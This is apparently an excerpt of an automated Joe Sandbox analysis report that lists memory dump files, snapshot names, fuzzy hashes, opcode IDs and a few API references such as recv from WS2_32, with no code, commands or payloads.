                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                  • Opcode ID: 53a04ac2cf705023e2619d924215063b84b2241ad984e2e670f5d0f64d3915f0
                                                                                                                                                                                                                                                  • Instruction ID: 696ebaf9e306ac462154c6aaa9546305aed8731742f2b2375a10a80313b2abd2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53a04ac2cf705023e2619d924215063b84b2241ad984e2e670f5d0f64d3915f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96B11670A10268DFEF29CF14C894BDEB7B5EF19304F5085D8E80967281D775AA88CF91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: uPR`
                                                                                                                                                                                                                                                  • API String ID: 0-3559325580
                                                                                                                                                                                                                                                  • Opcode ID: 98285fb5113dc6738cfec41fa42b4ddca93641e589aacc5d5c843fb21a47b662
                                                                                                                                                                                                                                                  • Instruction ID: 10d0c7ba7d36e9edf2717264a74e99ec10c619e28b3e994f261c1f21fc1b8288
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98285fb5113dc6738cfec41fa42b4ddca93641e589aacc5d5c843fb21a47b662
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF0C2DB2894503EA54240472A1C6F66BDFDBD77303388026E146C9A42EA952F5E7171
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2f37d79f4fb9b1306f5b60a15420e4a9fab11497e7a9f8517bfe3b847d51009b
                                                                                                                                                                                                                                                  • Instruction ID: 076e58ed2954fad01bda56526cf82157e3b889da9153a60a943aa871685515f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f37d79f4fb9b1306f5b60a15420e4a9fab11497e7a9f8517bfe3b847d51009b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 142181AB34E111BD7A1181473B18AFA27AFE7C6730738C827F807C5502E2946E5A7172
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9495147a75f65e52aa91244b433e4b43751f617c32bcc84d9d9a0d72e4bc9842
                                                                                                                                                                                                                                                  • Instruction ID: a6f398bed6fb913a5ac85f0234f50bb1cf382148b89468f519a94aec222edd8b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9495147a75f65e52aa91244b433e4b43751f617c32bcc84d9d9a0d72e4bc9842
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4116DEB24E011BDBA0185476B1CAFA2BAFD7C5730739C826F807C5406F2846E896176
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2e8cad196f0eb382dbd6577cfc411e8afbd9b0da8139f47aee82262f086ca409
                                                                                                                                                                                                                                                  • Instruction ID: 993383ed0ec05c05e11d94c05ed655f0ebb76772de51a872a2eb6f5458a12ceb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e8cad196f0eb382dbd6577cfc411e8afbd9b0da8139f47aee82262f086ca409
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 691151EB24D0117DB95284432B28AFA27EFE7D173073CC416F907C5501E2486E5A7172
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b93769c67c2eb356fcf4926f637439f835f4e62bcacf989bd7f56c26097a8234
                                                                                                                                                                                                                                                  • Instruction ID: 5ce0438f46abced324159db4f1302efbaca87e16a54f2feed0fcb0176864d144
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93769c67c2eb356fcf4926f637439f835f4e62bcacf989bd7f56c26097a8234
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 951160EB249161BEBA1280472B18AFA67AFD6C273073DC42AF907C5905E2482E5D6132
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d56ffeed39f4c31ab0c0d92f09c81ec3ab5f9708a44c235ef1ca70ab57cb7c18
                                                                                                                                                                                                                                                  • Instruction ID: 0b500f48ba22246ef122c11d321c3d4832e5572f43b251c41c13341c7b035327
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d56ffeed39f4c31ab0c0d92f09c81ec3ab5f9708a44c235ef1ca70ab57cb7c18
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F11C6EB28D1507EF50251572B29BF76BAED7C2730738851BF443C5542E1882E5E6131
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 6e29183252490f5519fdd1e38124e6035ce1b6bbfc7c39bd7c28aafeb51dbd1e
                                                                                                                                                                                                                                                  • Instruction ID: a24eb65bcc22fa56be822155a7bfc342e8c9e9f88a11f3a3c5c5d8a933dfd0e0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e29183252490f5519fdd1e38124e6035ce1b6bbfc7c39bd7c28aafeb51dbd1e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC015EEB289011BDB65181873B18AFB67AFE6C5730779C427F807C5901E6882F9D6171
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 034e211245aff8ee1c10a1256382010ab7ecca9f2d0289563db1ba40200007d1
                                                                                                                                                                                                                                                  • Instruction ID: 6fe988aea4876755761f13d9ce32db2ca55106c761b956dd12220452851044e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 034e211245aff8ee1c10a1256382010ab7ecca9f2d0289563db1ba40200007d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC0171FB249115BEBA5185473B18AFB67AFE6C1730739C42BF807C4501E2882E8D7171
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 86feaea4f2fd3fcf1e33961e3f0af81d10719a551e013e3860859f730941087d
                                                                                                                                                                                                                                                  • Instruction ID: 5f05f54d2f55c1210f82d2344b940c9b286b51fb44208ad84af062f51da6a9a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86feaea4f2fd3fcf1e33961e3f0af81d10719a551e013e3860859f730941087d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41017CEB289011BDB95685477B18AFB67AEE6D173073CC827F807C4802E6882E9D6131
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e02f800295eebff8cdeb578a0788c073b77c0e4b385727d69e99c0437a0f1649
                                                                                                                                                                                                                                                  • Instruction ID: e806ed13189867f62078469f4017ef09d16beb68334f9e9a933adae9ad9680e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e02f800295eebff8cdeb578a0788c073b77c0e4b385727d69e99c0437a0f1649
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC018FEB2891117EB55141473B28AFB67AEE6C2730738C427F543C1542E2882E4E2132
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ab5114c86868e22e879013063b5d6db293a955935158c7c8ee02193d1ff04ab8
                                                                                                                                                                                                                                                  • Instruction ID: 1e1efff85ab518aef9f7186438a0fab2d09d792ba6d6640de536ad66f84f9f32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab5114c86868e22e879013063b5d6db293a955935158c7c8ee02193d1ff04ab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB0131EB2891117DB55281473B18AFB67AFE6C2730738C427F947C5905F6882E9D7131
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2268156536.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4c90000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e64160cba816e888b001164131e130f43e07d3e5c67fdf685dd075dd77148682
                                                                                                                                                                                                                                                  • Instruction ID: 6f67eee140ef073483264584d0f624a57afd4f4340445f19ff6cfdaf8bccc643
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e64160cba816e888b001164131e130f43e07d3e5c67fdf685dd075dd77148682
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F04FFB2891117EB15581833719AFA6BAEE6C2730738C427F403C5502E6881E5D6172
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: e81a70a50d8f95ca94098167a0561123b15296d981f9a5a940e6dd398b255734
                                                                                                                                                                                                                                                  • Instruction ID: ba7e91e533d750c0c2e0c4dd363984f36dfb7fda1db123da860c92250ddab7ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e81a70a50d8f95ca94098167a0561123b15296d981f9a5a940e6dd398b255734
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C22C71E046288FDB25CE28DD807EAB7F5EB45705F1441EAD84DE7240EB79AE858F40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000004,00000000), ref: 00B2E10B
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000008,00000000), ref: 00B2E140
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
